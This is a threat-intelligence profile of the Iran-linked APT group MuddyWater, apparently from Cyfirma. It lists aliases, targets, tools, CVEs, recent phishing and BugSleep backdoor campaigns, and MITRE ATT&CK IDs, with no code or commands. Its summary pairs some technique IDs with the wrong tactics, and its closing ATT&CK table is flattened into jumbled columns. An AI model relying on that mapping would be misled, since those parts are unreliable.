Threat Research

APT Profile: MuddyWater – Cyfirma

Cyfirma

Summary:

MuddyWater is an advanced persistent threat (APT) group linked to the Iranian government, primarily targeting organizations in the Middle East. Utilizing in-memory attack techniques, they maintain a low detection profile while focusing on espionage and information theft. Their recent campaigns have involved phishing attacks and the deployment of custom malware, particularly against Israeli organizations.

Keypoints:

  • MuddyWater is affiliated with the Iranian government.
  • Targets include Saudi Arabia, UAE, Iraq, and other Middle Eastern countries.
  • Employs in-memory attack techniques, avoiding new binaries on victim machines.
  • Recent campaigns have intensified against Israeli organizations.
  • Utilizes phishing tactics to deploy legitimate remote management tools.
  • Developed a custom malware implant called BugSleep for remote command execution.

MITRE Techniques

  • Reconnaissance (T1589.002): Conducts reconnaissance to gather information about targets.
  • Persistence (T1574.002): Establishes persistence mechanisms to maintain access.
  • Discovery (T1053.005): Uses discovery techniques to identify system information.
  • Resource Development (T1583.006): Develops resources for future operations.
  • Initial Access (T1566.001): Gains initial access through phishing campaigns.
  • Lateral Movement (T1210): Moves laterally within the network to access other systems.
  • Execution (T1059.003): Executes commands on compromised systems.
  • Defense Evasion (T1562.001): Evades detection mechanisms to maintain access.
  • Credential Access (T1555): Attempts to access and steal credentials.
  • Exfiltration (T1041): Exfiltrates data from compromised systems.

Published On : 2024-11-12

APT Profile – MUDDYWATER

MuddyWater is an APT group assessed to be affiliated to the Iranian Government, that targets victims in the Middle East with in-memory vectors leveraging on PowerShell, in a family of attacks now identified as “Living off the land”, as they don’t require the creation of new binaries on the victim’s machine, thus maintaining a low detection profile and a low forensic footprint. The operators behind MuddyWater are likely espionage motivated. Despite the strong preponderance of victims from Pakistan, the most active targets appear to be in Saudi Arabia, the UAE, and Iraq.

Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala

Motivation:
Information theft and espionage

Target Technologies:
Office Suites Software, Operating System, Web Application

Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals

Targeted Countries
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali

Tools Used:
Secure Sockets Funneling , Remadmin , Chisel , Quarks pwDump , PowGoop (Downloader.Covic) , Mimikatz , POWERSTATS , PowGoop , Thanos ransomware

Recently Exploited Vulnerabilities by MUDDYWATER

CVE-2017-0199 CVE-2020-1472
CVE-2017-11882 CVE-2017-0144
CVE-2017-17215 CVE-2014-8361

MUDDYWATER’s Recent Campaign Highlights and Trends

  • In a recent campaign, the MuddyWater threat group is believed to have targeted organizations in Saudi Arabia, Turkey, Azerbaijan, India, and Portugal. The attackers have been using compromised organizational email accounts to send phishing messages, primarily aimed at deploying legitimate remote management tools like Atera Agent and Screen Connect. These phishing campaigns, ongoing since February 2024, focus on various sectors, including government bodies, municipalities, media outlets, and travel agencies. So far, over 50 spear-phishing emails have been identified across more than ten sectors, each customized to lure specific targets into enabling remote access through legitimate software, which helps MuddyWater evade detection while maintaining persistent access.
  • Since October 2024, MuddyWater has intensified its cyber operations against Israeli organizations. This increased activity is part of a broader campaign deploying a custom malware implant known as BugSleep. This new backdoor enables MuddyWater to execute remote commands and transfer files on compromised systems, representing a shift from their prior use of legitimate remote management tools like Atera Agent and Screen Connect. Designed for remote command execution and file transfer between infected systems and a command-and-control server, BugSleep is still under development, with continuous updates aimed at enhancing its functionality and evasion capabilities.

Malware used by MUDDYWATER: POWERSTATS MITRE ATT&CK Techniques used by MUDDYWATER

Reconnaissance Persistence Discovery
T1589.002 T1053.005 T1087.002
T1137.001 T1518.001
Resource Development T1574.002 T1049
T1583.006 T1547.001 T1016
T1588.002 T1057
Privilege Escalation T1033
Initial Access T1548.002 T1518
T1566.001 T1053.005 T1082
T1566.002 T1574.002 T1083
T1190 T1547.001
Lateral Movement
Execution Defense Evasion T1210
T1203 T1548.002
T1047 T1218.011 Collection
T1059.003 T1027 T1113
T1053.005 T1562.001 T1074.001
T1204.001 T1036.005 T1560.001
T1059.001 T1027.003
T1204.002 T1027.004 Command and Control
T1059.006 T1140 T1573.001
T1059.007 T1218.003 T1104
T1559.002 T1574.002 T1071.001
T1559.001 T1218.005 T1102.002
T1059.005 T1132.001
Credential Access T1219
T1555 T1090.002
T1555.003 T1105
T1552.001
T1003.005 Exfiltration
T1003.004 T1041
T1003.001

Source: Original Post

Tags: PERSISTENCE, PHISHING, RUSSIA, DISCOVERY, RECONNAISSANCE, CVE, GOVERNMENT, INITIAL ACCESS